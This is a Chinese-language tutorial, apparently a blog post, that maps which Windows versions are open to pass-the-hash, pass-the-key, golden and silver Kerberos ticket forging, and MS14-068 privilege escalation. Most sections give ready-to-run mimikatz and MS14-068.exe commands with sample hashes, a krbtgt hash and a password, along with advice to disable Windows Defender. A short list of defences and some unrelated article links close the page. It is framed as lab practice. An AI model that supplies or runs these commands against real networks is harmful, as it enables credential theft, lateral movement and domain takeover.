域渗透(web安全)

根据提供的系统版本(Windows 7 SP1、Windows 10 LTSC 2019、Windows Server 2012 R2)和攻击类型(PTH/PTK/PTT/黄金票据/白银票据),以下是适配性分析及操作建议:


一、PTH(Pass the Hash)横向攻击适配性

1. Windows 7 SP1
  • 支持性:完全支持(默认未安装KB2871997补丁)

  • 攻击条件

    • 未打补丁时,所有用户均可通过LM/NTLM哈希传递

    • 若已安装KB2871997补丁,仅支持Administrator用户传递

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:administrator /domain:mamba.com /ntlm:168665b84b96d6973f867364f53b0180"
  • 防御绕过:需关闭Windows Defender实时监控(通过注册表或组策略)13

2. Windows 10 LTSC 2019
  • 支持性:受限(默认集成KB2871997补丁)

  • 攻击条件:仅支持Administrator用户的NTLM哈希传递

  • 限制:若启用Credential Guard或LSA保护,需额外绕过措施7

3. Windows Server 2012 R2
  • 支持性:受限(默认安装KB2871997补丁)

  • 攻击条件:仅支持Administrator用户,且需目标开放SMB服务(445端口)

  • 推荐场景:优先使用PTK(AES256)或PTT攻击26


二、PTK(Pass the Key)横向攻击适配性

1. Windows 7 SP1
  • 支持性:需手动安装KB2871997补丁后可用

  • 攻击条件 :需获取AES256密钥(通过sekurlsa::ekeys

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "sekurlsa::pth /user:mamba /domain:mamba.com /aes256:a7ddbb2c4b7216746b8c523cf7995d2ed4c29f2ee4b795175b5ffce97ded3387"
2. Windows 10 LTSC 2019
  • 支持性:完全支持(默认启用AES加密)

  • 优势:绕过NTLM限制,支持所有用户传递9

3. Windows Server 2012 R2
  • 支持性:完全支持(补丁默认生效)

  • 适用场景:针对禁用NTLM的域环境,需结合服务识别(如LDAP/CIFS)6


三、PTT(Pass the Ticket)横向攻击适配性

1. 黄金票据(Golden Ticket)
  • 适用系统:所有系统(依赖域控权限)

  • 攻击条件

    • 获取krbtgt用户的NTLM Hash(lsadump::dcsync

    • 域名、域SID信息

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /admin:administrator /domain:mamba.com /sid:S-1-5-21-XXXX /krbtgt:be0e527500207aa091f504474347f48b /ticket:golden.kirbi"
    kerberos::ptt golden.kirbi
  • 适配性:适用于所有系统,但需域控(如Server 2012 R2)未启用AES强制加密37

2. 白银票据(Silver Ticket)
  • 适用系统:所有系统(需目标服务支持)

  • 攻击条件

    • 服务账户的NTLM Hash(如CIFS/SQL Server)

    • 域名、域SID、服务SPN

  • 实验命令

    bash

    复制

    复制代码
    mimikatz "kerberos::golden /user:mamba /domain:mamba.com /sid:S-1-5-21-XXXX /target:dc.mamba.com /service:cifs /rc4:08972e15b1763a8537f276b159840c17 /ticket:silver.kirbi"
  • 适配性:尤其适合Windows Server 2012 R2(常见域控服务如CIFS/LDAP)8

3. MS14-068漏洞利用
  • 适用系统:仅未打补丁的Windows Server 2012 R2及更早版本

  • 限制:需普通域用户权限,且目标域控未安装KB3011780补丁

  • 实验步骤

    bash

    复制

    复制代码
    MS14-068.exe -u mamba3@mamba.com -s S-1-5-21-XXXX -d 192.168.128.128 -p Zrs123456..
    kerberos::ptc TGT_administrator@mamba.com.ccache
  • 适配性:Windows 7/Server 2012 R2可能适用,Windows 10已修复17


四、靶机适配性总结

攻击类型 Windows 7 SP1 Windows 10 LTSC 2019 Windows Server 2012 R2
PTH(NTLM) ✅(未打补丁) ⚠️(仅Administrator) ⚠️(仅Administrator)
PTK(AES256) ⚠️(需补丁)
黄金票据 ✅(最佳适配域控)
白银票据 ✅(CIFS服务) ✅(需服务支持) ✅(最佳适配CIFS/LDAP)
MS14-068漏洞 ❌(已修复) ⚠️(需未打补丁)

五、防御建议

  1. 补丁管理:确保所有系统安装KB2871997(PTH限制)、KB3011780(MS14-068修复)27

  2. 加密策略:强制使用AES256替代RC4,禁用NTLM协议3

  3. 日志监控:审计Kerberos票据事件(事件ID 4769/4771),检测异常票据生成8

  4. 权限控制:限制本地管理员账户同名问题,启用LSA保护9

如需进一步验证攻击路径,可使用systeminfo查看补丁状态,或通过BloodHound分析域内信任关系。

相关推荐
pt10435 分钟前
思科网络自动化入门课程介绍
运维·网络·自动化
AI创界者7 分钟前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
CHENKONG_CK9 小时前
晨控CK-FR102ANS-EIP与基恩士KVX520系列PLC配置EtherNet/IP通讯连接手册
网络
@insist12310 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
草根站起来10 小时前
“双算法SSL证书”伪方案、国产SSL证书营销话术与等保绑定乱象批判
网络·网络协议·ssl
IT小白杨10 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
Bobolink_11 小时前
跨境业务网络环境评估,“干净、一致、独享”三个关键指标
开发语言·网络·php·跨境网络·网络环境
humors22111 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记11 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
广州灵眸科技有限公司12 小时前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能